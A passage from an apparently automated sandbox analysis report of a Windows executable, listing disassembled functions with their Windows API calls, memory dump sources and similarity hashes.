                        • Instruction Fuzzy Hash: 5821B031608214AFDB11DFE9CCCCDAAB7ACEB183607108125F915CB2A0D674DC41CB65
                        Function 009F04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                        Download Yara Rule
                        APIs
                        • GetStdHandle.KERNEL32(0000000C), ref: 009F04F2
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009F052E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateHandlePipe
                        • String ID: nul
                        • API String ID: 1424370930-2873401336
                        • Opcode ID: 9573f8f6537203730c120e168737a94fba34bbe246899f54b85b5d873df22773
                        • Instruction ID: 4c0121a2518bee8270b385ca0530c364c5da3420c209a2b7d20cf108fae22be2
                        • Opcode Fuzzy Hash: 9573f8f6537203730c120e168737a94fba34bbe246899f54b85b5d873df22773
                        • Instruction Fuzzy Hash: 11216075500309ABDF209F6ADC44AAA77BCBF95724F204A19FAA1D72E1D7B0D941CF20
                        Function 009F05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                        Download Yara Rule
                        APIs
                        • GetStdHandle.KERNEL32(000000F6), ref: 009F05C6
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009F0601
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateHandlePipe
                        • String ID: nul
                        • API String ID: 1424370930-2873401336
                        • Opcode ID: e938ba35140d7302de59ea1553fc9bd8ed0ac0dc6b15a071817738d5a7e3d5ab
                        • Instruction ID: d3ae2396113420eed440d3e9c7500c23e4b3da48fb1849ca9606faf0b23207fd
                        • Opcode Fuzzy Hash: e938ba35140d7302de59ea1553fc9bd8ed0ac0dc6b15a071817738d5a7e3d5ab
                        • Instruction Fuzzy Hash: AB21A3755003199BDB209F698C04AAA77ECBFD5734F204B19FAB1E72D1D7B09861CB10
                        Function 00A140AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0098600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0098604C
                          • Part of subcall function 0098600E: GetStockObject.GDI32(00000011), ref: 00986060
                          • Part of subcall function 0098600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0098606A
                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A14112
                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A1411F
                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A1412A
                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A14139
                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A14145
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$CreateObjectStockWindow
                        • String ID: Msctls_Progress32
                        • API String ID: 1025951953-3636473452
                        • Opcode ID: 115dc4951e7ab7b15b8cd833157b2c8e33cd6ffdf8ffca91be56f989fe952faa
                        • Instruction ID: 03f9bf19b62e03bf4aa05d62dc87725f695dda1045f4b05c7726c8b9eec98e2e
                        • Opcode Fuzzy Hash: 115dc4951e7ab7b15b8cd833157b2c8e33cd6ffdf8ffca91be56f989fe952faa
                        • Instruction Fuzzy Hash: B711B2B2140219BEEF119FA4CC86EE77F6DEF097A8F004210BA18A6150C7769C61DBA4
                        Function 009BD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009BD7A3: _free.LIBCMT ref: 009BD7CC
                        • _free.LIBCMT ref: 009BD82D
                          • Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
                          • Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0
                        • _free.LIBCMT ref: 009BD838
                        • _free.LIBCMT ref: 009BD843
                        • _free.LIBCMT ref: 009BD897
                        • _free.LIBCMT ref: 009BD8A2
                        • _free.LIBCMT ref: 009BD8AD
                        • _free.LIBCMT ref: 009BD8B8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                        • Instruction ID: 950a6317ee48bb8feeffde864bbdff02ac409b93e0875093dc4c652007aca3fa
                        • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                        • Instruction Fuzzy Hash: 981121B1542B08BBE521BFB0CE87FCB7BDCAF84720F404C25B29DA6492EA65B5054650
                        Function 009EDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 009EDA74
                        • LoadStringW.USER32(00000000), ref: 009EDA7B
                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009EDA91
                        • LoadStringW.USER32(00000000), ref: 009EDA98
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009EDADC
                        Strings
                        • %s (%d) : ==> %s: %s %s, xrefs: 009EDAB9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString$Message
                        • String ID: %s (%d) : ==> %s: %s %s
                        • API String ID: 4072794657-3128320259
                        • Opcode ID: 5733d554c2bd95ad76f5a9d98ecadf34f5a06160f67ad2938671c9287a9c6714
                        • Instruction ID: b0ac014d5eb87dbffe90575a7e6bc22aa2b4404520822de92271e1f1108d79fb
                        • Opcode Fuzzy Hash: 5733d554c2bd95ad76f5a9d98ecadf34f5a06160f67ad2938671c9287a9c6714
                        • Instruction Fuzzy Hash: 970186F65402087FE711DBE09D89FE7336CE708311F4049A1B716E2041E6749E854F74
                        Function 009F096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                        Download Yara Rule
                        APIs
                        • InterlockedExchange.KERNEL32(0135E430,0135E430), ref: 009F097B
                        • EnterCriticalSection.KERNEL32(0135E410,00000000), ref: 009F098D
                        • TerminateThread.KERNEL32(0135E428,000001F6), ref: 009F099B
                        • WaitForSingleObject.KERNEL32(0135E428,000003E8), ref: 009F09A9
                        • CloseHandle.KERNEL32(0135E428), ref: 009F09B8
                        • InterlockedExchange.KERNEL32(0135E430,000001F6), ref: 009F09C8
                        • LeaveCriticalSection.KERNEL32(0135E410), ref: 009F09CF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                        • String ID:
                        • API String ID: 3495660284-0
                        • Opcode ID: c45027c8b21bd8d17ce61e179c3c1f8c5e79e9a1b05c53ea584b6a115f85e83a
                        • Instruction ID: 6f68a98fe89e9b9e5428f7d2f686ce80ce137c5c97030bb16890624426cf8ed0
                        • Opcode Fuzzy Hash: c45027c8b21bd8d17ce61e179c3c1f8c5e79e9a1b05c53ea584b6a115f85e83a
                        • Instruction Fuzzy Hash: A5F03131482622BBD751AFD4EE8CBE6BB39FF51712F405015F201508A1D7749466CF90
                        Function 00985D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                        Download Yara Rule
                        APIs
                        • GetClientRect.USER32(?,?), ref: 00985D30
                        • GetWindowRect.USER32(?,?), ref: 00985D71
                        • ScreenToClient.USER32(?,?), ref: 00985D99
                        • GetClientRect.USER32(?,?), ref: 00985ED7
                        • GetWindowRect.USER32(?,?), ref: 00985EF8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Rect$Client$Window$Screen
                        • String ID:
                        • API String ID: 1296646539-0
                        • Opcode ID: 3d6a448f7e847a4c0098c4ccfadb2b1f561ef567f3e1c6ad512456d26db15f16
                        • Instruction ID: ff74478e4563a5818ad2ddb0428bc4cc0451535f287e7f458ef4552efa4c9b87
                        • Opcode Fuzzy Hash: 3d6a448f7e847a4c0098c4ccfadb2b1f561ef567f3e1c6ad512456d26db15f16
                        • Instruction Fuzzy Hash: 5CB18C34A0074ADBDB10DFA8C880BEEB7F5FF58310F14981AE8A9D7250DB34AA55DB51
                        Function 009B01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                        Download Yara Rule
                        APIs
                        • __allrem.LIBCMT ref: 009B00BA
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009B00D6
                        • __allrem.LIBCMT ref: 009B00ED
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009B010B
                        • __allrem.LIBCMT ref: 009B0122
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009B0140
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 1992179935-0
                        • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                        • Instruction ID: 3cc34d3ac5473c412fcdd184d5c5c80d4fc0af48fd48009433d7aee9f77ac500
                        • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                        • Instruction Fuzzy Hash: 8C81E372A007069FE724AA68CD52BAB73E8EFC2374F24453EF451D7281E7B4D9008B90
                        Function 00A01D10 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00A03149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00A0101C,00000000,?,?,00000000), ref: 00A03195
                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A01DC0
                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A01DE1
                        • WSAGetLastError.WSOCK32 ref: 00A01DF2
                        • inet_ntoa.WSOCK32(?), ref: 00A01E8C
                        • htons.WSOCK32(?,?,?,?,?), ref: 00A01EDB
                        • _strlen.LIBCMT ref: 00A01F35
                          • Part of subcall function 009E39E8: _strlen.LIBCMT ref: 009E39F2
                          • Part of subcall function 00986D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0099CF58,?,?,?), ref: 00986DBA
                          • Part of subcall function 00986D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0099CF58,?,?,?), ref: 00986DED
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                        • String ID:
                        • API String ID: 1923757996-0
                        • Opcode ID: 29010f8bc52c293e74be9ce6a9178452ee42b8e7643b411975083078c7677eb4
                        • Instruction ID: 7408962901c5bf4a7a9060e2da809228a388055ef46b12f9b1e09788134b8ec8
                        • Opcode Fuzzy Hash: 29010f8bc52c293e74be9ce6a9178452ee42b8e7643b411975083078c7677eb4
                        • Instruction Fuzzy Hash: 2EA1DC31204305AFC724EB24D885FAABBE5AFC5318F54894CF4569B2E2DB31ED42CB91
                        Function 009B61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009A82D9,009A82D9,?,?,?,009B644F,00000001,00000001,8BE85006), ref: 009B6258
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009B644F,00000001,00000001,8BE85006,?,?,?), ref: 009B62DE
                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009B63D8
                        • __freea.LIBCMT ref: 009B63E5
                          • Part of subcall function 009B3820: RtlAllocateHeap.NTDLL(00000000,?,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6,?,00981129), ref: 009B3852
                        • __freea.LIBCMT ref: 009B63EE
                        • __freea.LIBCMT ref: 009B6413
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                        • String ID:
                        • API String ID: 1414292761-0
                        • Opcode ID: 6aba2e229c5c23e9d38ac47cb55b3a71f258031cbf2bab4638e8a5dd5e1cfff4
                        • Instruction ID: 10e5259da6331b2e06c985211790a028bc131e9d852dca0eff9b101f1c4c2629
                        • Opcode Fuzzy Hash: 6aba2e229c5c23e9d38ac47cb55b3a71f258031cbf2bab4638e8a5dd5e1cfff4
                        • Instruction Fuzzy Hash: 2851B172A00216ABEB258FA4DE81FFF77AAEB84770F154629FC05D6150DB38EC44C660
                        Function 00A0BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 00A0C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A0B6AE,?,?), ref: 00A0C9B5
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0C9F1
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA68
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA9E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A0BCCA
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A0BD25
                        • RegCloseKey.ADVAPI32(00000000), ref: 00A0BD6A
                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A0BD99
                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A0BDF3
                        • RegCloseKey.ADVAPI32(?), ref: 00A0BDFF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                        • String ID:
                        • API String ID: 1120388591-0
                        • Opcode ID: 6bcf48348f6648ba0db677ab05a160436cef3f54070ef2569e5fc5bf8ad83b32
                        • Instruction ID: 5c6fc8b273a56825cdfe363224d5eca0b7424bf1dc6386ac1d19a02a19952ba7
                        • Opcode Fuzzy Hash: 6bcf48348f6648ba0db677ab05a160436cef3f54070ef2569e5fc5bf8ad83b32
                        • Instruction Fuzzy Hash: 7B81C030218245EFD714DF24D991E2ABBE5FF84308F14855CF4598B2A2DB31ED45CBA2
                        Function 009DF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(00000035), ref: 009DF7B9
                        • SysAllocString.OLEAUT32(00000001), ref: 009DF860
                        • VariantCopy.OLEAUT32(009DFA64,00000000), ref: 009DF889
                        • VariantClear.OLEAUT32(009DFA64), ref: 009DF8AD
                        • VariantCopy.OLEAUT32(009DFA64,00000000), ref: 009DF8B1
                        • VariantClear.OLEAUT32(?), ref: 009DF8BB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Variant$ClearCopy$AllocInitString
                        • String ID:
                        • API String ID: 3859894641-0
                        • Opcode ID: 1293461f6334055da678359a69170dea63bde879e3c551de77c2fb2fe0946a22
                        • Instruction ID: f717a62bc2ad8842bc78a4f174caa310e9033ed40f4655c769ab0e9fbe47cabd
                        • Opcode Fuzzy Hash: 1293461f6334055da678359a69170dea63bde879e3c551de77c2fb2fe0946a22
                        • Instruction Fuzzy Hash: 3E51C635980310BACF14AB65D8B6B39B3A8EF85310B24C867E907EF391DB748C40C796
                        Function 009F910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00987620: _wcslen.LIBCMT ref: 00987625
                          • Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A
                        • GetOpenFileNameW.COMDLG32(00000058), ref: 009F94E5
                        • _wcslen.LIBCMT ref: 009F9506
                        • _wcslen.LIBCMT ref: 009F952D
                        • GetSaveFileNameW.COMDLG32(00000058), ref: 009F9585
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$FileName$OpenSave
                        • String ID: X
                        • API String ID: 83654149-3081909835
                        • Opcode ID: 9633b7f2f4f055d0baa0f0e10ed5349c38ba60fb58986c56efe05f44dde614f0
                        • Instruction ID: 8f160e3aa0b82fc58480fc9e2bab66bf741900abadbe95031c3b70a340ef3b28
                        • Opcode Fuzzy Hash: 9633b7f2f4f055d0baa0f0e10ed5349c38ba60fb58986c56efe05f44dde614f0
                        • Instruction Fuzzy Hash: EEE178316083119FD724EF24C881B6AB7E4BF85314F14896DF9999B3A2DB31ED05CB92
                        Function 0099920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2
                        • BeginPaint.USER32(?,?,?), ref: 00999241
                        • GetWindowRect.USER32(?,?), ref: 009992A5
                        • ScreenToClient.USER32(?,?), ref: 009992C2
                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 009992D3
                        • EndPaint.USER32(?,?,?,?,?), ref: 00999321
                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009D71EA
                          • Part of subcall function 00999339: BeginPath.GDI32(00000000), ref: 00999357
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                        • String ID:
                        • API String ID: 3050599898-0
                        • Opcode ID: 071df920a95f11dcfe74ecb90467ccc33cda28feb8898b4296bc32bd4487dfa6
                        • Instruction ID: d9b6006f3f77405cd083eef74be73082a216968b91dee4b9826c029ee2931d13
                        • Opcode Fuzzy Hash: 071df920a95f11dcfe74ecb90467ccc33cda28feb8898b4296bc32bd4487dfa6
                        • Instruction Fuzzy Hash: 0241B070148300EFDB21DFA8CC85FBA7BA8FB46321F04462DF965872A1D7319846DB61
                        Function 009F07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                        Download Yara Rule
                        APIs
                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 009F080C
                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 009F0847
                        • EnterCriticalSection.KERNEL32(?), ref: 009F0863
                        • LeaveCriticalSection.KERNEL32(?), ref: 009F08DC
                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 009F08F3
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 009F0921
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
